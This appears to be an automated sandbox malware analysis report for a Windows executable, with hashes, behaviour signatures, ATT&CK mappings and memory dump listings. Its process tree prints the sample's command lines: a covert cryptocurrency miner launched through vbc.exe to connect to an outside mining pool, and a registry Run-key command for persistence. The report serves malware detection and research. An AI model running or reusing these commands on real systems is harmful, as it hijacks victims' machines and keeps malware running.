Analysis

  • max time kernel
    171s
  • max time network
    168s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    24-11-2022 21:47

General

  • Target

    9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe

  • Size

    1.3MB

  • MD5

    d08af005a79bb8e5f92e32b52874b722

  • SHA1

    7a95179e88f4a6ee33192f13dfc5c2b9d8274bc6

  • SHA256

    9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4

  • SHA512

    c8893b32215d4b1d57f0143cdc9d7b809fa2adba2fad6826bad52310da0ecc355a06d6b832830e757480bd2174a507ab51d97b7873860f0bbee4c5b296f433b1

  • SSDEEP

    24576:esabjkjys3jhmgWKU8tkYphKqK2B54cDW4EmolRCpSSup5Uixp2IQtHZq:esaPkp311Hf3KW1DW4iOSSuptv2d5

Score
7/10

Malware Config

Signatures

  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
    "C:\Users\Admin\AppData\Local\Temp\9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1780
    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -a scrypt -o stratum+tcp://hot.wemineltc.com:3334 -u lover83.raid -p lover123123 -T 83 -t 2 -g No
      2⤵
      • Checks processor information in registry
      PID:956
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Wcenter" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Wcenter57.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Wcenter" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Wcenter57.exe
        3⤵
        • Adds Run key to start application
        PID:2004

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scripting

1
T1064

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Scripting

1
T1064

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/956-95-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-68-0x0000000000401140-mapping.dmp
  • memory/956-56-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-57-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-59-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-61-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-62-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-64-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-65-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-67-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-96-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-70-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-71-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-72-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-77-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-78-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-79-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-81-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-80-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-82-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-83-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-85-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-84-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-87-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-86-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-89-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-90-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-630-0x0000000000300000-0x00000000003AE000-memory.dmp
    Filesize

    696KB

  • memory/956-91-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-93-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-629-0x0000000000400000-0x0000000000642000-memory.dmp
    Filesize

    2.3MB

  • memory/956-104-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-92-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-103-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-98-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-97-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-102-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-101-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-99-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-100-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-122-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-121-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-120-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-119-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-118-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-117-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-116-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-115-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-114-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-113-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-112-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-111-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-110-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-109-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-108-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-107-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-106-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/956-127-0x0000000000300000-0x00000000003AE000-memory.dmp
    Filesize

    696KB

  • memory/956-105-0x0000000000650000-0x000000000070D000-memory.dmp
    Filesize

    756KB

  • memory/1672-88-0x0000000000000000-mapping.dmp
  • memory/1780-54-0x00000000762F1000-0x00000000762F3000-memory.dmp
    Filesize

    8KB

  • memory/1780-55-0x0000000074DE0000-0x000000007538B000-memory.dmp
    Filesize

    5.7MB

  • memory/1780-628-0x0000000074DE0000-0x000000007538B000-memory.dmp
    Filesize

    5.7MB

  • memory/2004-94-0x0000000000000000-mapping.dmp